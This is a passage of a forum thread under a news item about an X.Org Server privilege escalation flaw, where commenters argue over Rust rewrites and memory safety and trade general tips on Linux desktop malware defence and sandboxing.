Announcement

Collapse
No announcement yet.

X.Org Server Hit By New Local Privilege Escalation Vulnerability

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #51
    Originally posted by scottishduck View Post
    Do you want the working protocol that’s riddled with vulnerabilities or the protocol that’s been in development for 14 years and still doesn’t work. Make your choice.
    Easy. I'll go with the vulnerabilities on my personal computer. No other users. I care more about basic features. Sure, malware could escalate to root permissions, but I care more about my /home than about the /usr/bin anyway. If malware gets on my system, it already got access to my most important files. Sure, root access would mean malware could become persistent on reboot, that is not a good thing. But one can fight malware on different levels (firewalls, antivirus software, browser blocklists) while on the other hand, limiting your feature-set is literally limiting.

    Comment


    • #52
      Originally posted by ryao View Post
      Rust is not 100% immune to memory issues, since it needs unsafe Rust to work in many cases and unsafe Rust is well known to suffer from memory issues. For example:

      Developed at the Georgia Institute of Technology, Rudra is a static analyzer able to report potential memory safety bugs in Rust programs. Rudra has been used to scan the entire Rust package registry and identified 264 new memory safety bugs.
      Of course not, but it makes memory related issues incredibly easy to pin down, as unsafe code is the only culprit that needs to be fixed.

      Also, the research shows bugs found over all crates downloaded from crates.io, not one single crate.

      Originally posted by ryao View Post
      For completeness, I should add that compiler bugs can also result in memory safety issues.
      Yes, but so far is has been rare in Rust.

      Originally posted by ryao View Post
      However, even if there really were no memory safety issues, other classes of bugs would occur in enough abundance to make replacements more buggy than the original software. Let us say that a rewrite from scratch will have 10x the bugs (which is likely a conservative estimate). Then even if you eliminate 70% via memory safety, you still have 3x the bugs. This is why you have various industry leaders that encourage Rust adoption suggesting that Rust be used only for new projects rather than calling for complete rewrites in Rust.
      Excuse me, but do you have anything backing what you say?
      Where does the number like 10x comes from?

      What is the project we are talking about?
      How do they plan the rewrite?

      Without details, you could be comparing apples to oranges.

      There are a lot of examples out there where a rewrite actually benefits, like Google rewriting their own low-level android drivers, cloudflare rewriting their nginx + lua solution using async rust.

      Comment


      • #53
        Originally posted by evert_mouw View Post
        Easy. I'll go with the vulnerabilities on my personal computer. No other users. I care more about basic features. Sure, malware could escalate to root permissions, but I care more about my /home than about the /usr/bin anyway. If malware gets on my system, it already got access to my most important files. Sure, root access would mean malware could become persistent on reboot, that is not a good thing.
        Malwares don't even need root to persist.

        It can simply install itself to $HOME/.bin and adds some code to your .profile/.bashrc/.bashprofile and then it will start next time you uses your shell.

        It can also add symlinks to itself into $HOME/.bin, e.g. if it adds $HOME/.bin/ls to itself and then $HOME/.bin is in your $PATH before /usr, which is usually the case, next time you run ls it will actually run the malware.

        Even if X server is not run with root permission, it's still possible to run as root given that a lot of people enables passwordless sudo.
        All it takes is one "sudo ..." and your computer is 100% compromised.

        Originally posted by evert_mouw View Post
        But one can fight malware on different levels (firewalls, antivirus software, browser blocklists) while on the other hand, limiting your feature-set is literally limiting.
        Firewalls generally don't help much in blocking malwares unless you are running a server and use it to prevent attackers from bruteforce your ssh password/key or trying to trigger CVEs in your network stack, or preventing DDoS which is probably its most important use case.

        I'm not aware any good antivirus software on Linux.

        For blocklists, unless you use a whitelist, otherwise it's only effective against known bad actors.

        For starter, you can use firejail which uses linux namespace to sandbox applications.

        If you don't mind some performance penalty, you can go for gVisor or Firecracker which uses a small VMM to reduce attack surface by emulating the linux syscalls themselves instead of pass it to Linux directly.

        Comment


        • #54
          Originally posted by NobodyXu View Post

          Excuse me, but do you have anything backing what you say?
          Where does the number like 10x comes from?

          .
          Actual experience. If you post a question to stack overflow asking for references for what I posted, you will likely get a number of them. Much of what I have written can be backed up by statistics (and I have seen data showing it in the past). It is unfortunate that I do not have links to that data to give you, but the guys at Stack Overflow should have them.
          Last edited by ryao; 07 February 2023, 08:27 AM.

          Comment


          • #55
            Originally posted by NobodyXu View Post
            Malwares don't even need root to persist. [...]
            ​True, forgot to mention it.


            Firewalls generally don't help much in blocking malwares unless you are running a server and use it to prevent attackers from bruteforce your ssh password/key or trying to trigger CVEs in your network stack, or preventing DDoS which is probably its most important use case.

            I'm not aware any good antivirus software on Linux.

            For blocklists, unless you use a whitelist, otherwise it's only effective against known bad actors.

            For starter, you can use firejail which uses linux namespace to sandbox applications.

            If you don't mind some performance penalty, you can go for gVisor or Firecracker which uses a small VMM to reduce attack surface by emulating the linux syscalls themselves instead of pass it to Linux directly.
            Using sshguard by default, and Ext4 encryption for $HOME. Daily backups to a OmniOS (solaris-derived) system with ZFS snapshots. I try to have backups on a slightly different OS-es so not all of my boxes have the same vulnerabilities.

            In my experience, most malware comes through the browser. I'll review your suggestions; thanks!

            Comment


            • #56
              Originally posted by ryao View Post

              Actual experience. If you post a question to stack overflow asking for references for what I posted, you will likely get a number of them. Much of what I have written can be backed up by statistics. It is unfortunate that I do not have links to that data to give you, but the guys at Stack Overflow should have them.
              My experience with programming is that while rewrite is hard, a well-done rewrite will often simplify the code and often spot the bugs in the old implementation, that is given you do have a test suite.

              That happens in the Linux kernel all the time, and it often involves changing the API, is there any proof that the old Linux kernel has significantly less bug than the new one due to these rewrites?

              An example is that there are many CVEs in the 4.x due to linux namespace being a new feature and they messed it up to the point of it's not suitable for secure sandbox.
              And then there comes wasm, which is an interpreter with capability based syscalls (wasm component), meaning everything is sandboxed by default and you cannot open anything unless you have the capability.

              It is significantly more secure than Linux namespace that many cloud providers have adopted it and it can actually run multiple wasm instances from different clients without using virtual machine.

              While it's not exactly a rewrite, they are similar technology with overlapping use case and wasm is invented after linux namespace and docker and is strictly more complex than linux namespace, yet they get it right and Linux kernel has failed this.

              And the statistics is only meaningful with context and details, otherwise it could be just made up of all the failed rewrite attempts.

              Comment


              • #57
                Originally posted by evert_mouw View Post
                Using sshguard by default, and Ext4 encryption for $HOME. Daily backups to a OmniOS (solaris-derived) system with ZFS snapshots. I try to have backups on a slightly different OS-es so not all of my boxes have the same vulnerabilities.
                I think the best way to prevent malware is to cut the internet connection.
                So you put the ZFS backup system entire off-line and only connects to/turns on it when needed.
                Also, since most malwares now comes with browser as you have mentioned, it's already significantly more secure without web browser.

                Originally posted by evert_mouw View Post
                In my experience, most malware comes through the browser. I'll review your suggestions; thanks!
                You could also use Qubes OS https://www.qubes-os.org/ which is probably as secure as you can get since it runs each application in its own xen vm.
                It also runs the network stack, storage stack, bluetooth in its our VM, so I believe it's the most secure one unless you use a dedicated computer for web browsing and another for other activities.

                Comment


                • #58
                  This thread delivers like a meth addict working for Uber Eats.

                  Comment


                  • #59
                    Originally posted by ryao View Post
                    Actual experience. If you post a question to stack overflow asking for references for what I posted, you will likely get a number of them. Much of what I have written can be backed up by statistics (and I have seen data showing it in the past). It is unfortunate that I do not have links to that data to give you, but the guys at Stack Overflow should have them.
                    Well, if you post a question to stack overflow about rewrites that went well, then you'll also get many examples. This proves nothing.
                    Actually actual experience of single developer also proves nothing. I've seen some code rewrites that had more bugs and some that had less bugs. I've also seen some projects that had not fixable design bugs and complete rewrite was the only way to move forward.

                    Comment


                    • #60
                      Originally posted by ryao View Post

                      Rust is not 100% immune to memory issues, since it needs unsafe Rust to work in many cases and unsafe Rust is well known to suffer from memory issues. For example:
                      I never said its immune, you are twisting my words. I said for the areas of code where Rust's linear type checker (which checks memory management) is used, that part of the code specifically is verified to not have memory leaks (which is obviously not unsafe).

                      This kind of reasoning is fallacious anyways even in the few areas where unsafe needs to be used, everywhere else you do not have to worry about these problems which already by definition reduces the scope for security issues massively, which is much better than the status quo in C/C++

                      Originally posted by ryao View Post
                      For completeness, I should add that compiler bugs can also result in memory safety issues.
                      Yes they can, even CPU's can have bugs on the silicon level. In practice you are unlikely going to hit this kind of problem in a stable Rust release, however what you will hit in practice quite frequently is use after free errors in programs written in C (like what this is thread is about)

                      Originally posted by ryao View Post
                      However, even if there really were no memory safety issues, other classes of bugs would occur in enough abundance to make replacements more buggy than the original software. Let us say that a rewrite from scratch will have 10x the bugs (which is likely a conservative estimate). Then even if you eliminate 70% via memory safety, you still have 3x the bugs. This is why you have various industry leaders that encourage Rust adoption suggesting that Rust be used only for new projects rather than calling for complete rewrites in Rust.
                      For starters this is all based on assumptions. You can only claim these things scientifically if you have a control which in this case would have to be keeping the language the same and in our case we are not arguing that. While it is true that recoding things has a potential to introduce new logic bugs (although Rust even can check against those, specifically concurrent logic bugs), arguing what the ratios are is pure speculation.

                      What we do know is that rewriting existing C/C++ software in Rust is providing tangible benefits, especially when it comes to security. Its also bringing performance improvements, not because Rust is intrinsically faster (although there is some untapped future potential for Rust being faster here) but because Rust provides fearless concurrency, i.e. due to how easy it is to shoot yourself in the foot out of fear a lot of C programs were written in either a single threaded manner or implemented concurrency very trivially in a low hanging fruit manner (i.e. on a process level which brings multiplexing overhead). Due to Rust statically checking these issues, programs can be re-written from scratch with concurrency in mind without having to worry about decades long debugging of concurrency problems (which also differ between architectures making things worse i.e. ARM's memory semantics are weaker than x86's).

                      Originally posted by Sevard View Post
                      Well, if you post a question to stack overflow about rewrites that went well, then you'll also get many examples. This proves nothing.
                      Actually actual experience of single developer also proves nothing. I've seen some code rewrites that had more bugs and some that had less bugs. I've also seen some projects that had not fixable design bugs and complete rewrite was the only way to move forward.
                      Yeah using stack overflow to answer the question "do rewrites produce more bugs" is inaccurate to the level of a facepalm
                      Last edited by mdedetrich; 07 February 2023, 09:42 AM.

                      Comment

                      Working...
                      X